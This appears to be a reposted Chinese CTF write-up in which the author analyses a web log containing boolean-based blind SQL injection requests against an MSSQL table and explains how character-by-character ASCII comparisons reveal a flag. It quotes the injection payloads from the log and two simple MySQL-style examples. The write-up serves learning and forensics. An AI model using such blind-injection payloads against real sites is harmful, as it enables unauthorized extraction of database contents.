[Misc ]bw 注入过程 150 - 走看看

zoukankan html css js c++ java

[Misc ]bw 注入过程 150
下下来一个日志，先解码

搜索flag，在尾部发现布尔型盲注的日志：
```
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>32 80 - 192.168.1.101 200 0 0

id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>56 80 - 192.168.1.101 500 0 0
```
?id =1 and (select ord(substr(flag,1,1)) from flag)>96

?id =1 and (select ord(substr(flag,1,1)) from flag)>97

学sql注入的时候猜字段，比如说>96的时候是true 而>97是false，那么说明这个字符的ASCII值就是97

在日志里提取出flag，然后依次分析。
查看全文

相关阅读:
freopen
字符
 map映射
 P3512 [POI2010]PIL-Pilots-洛谷luogu
快读
 单调队列&单调栈
 简写
 邻接表&链式前向星
 mysql参数详解
 网络管理指南

原文地址：https://www.cnblogs.com/rookieDanny/p/8590502.html

Copyright © 2011-2022 走看看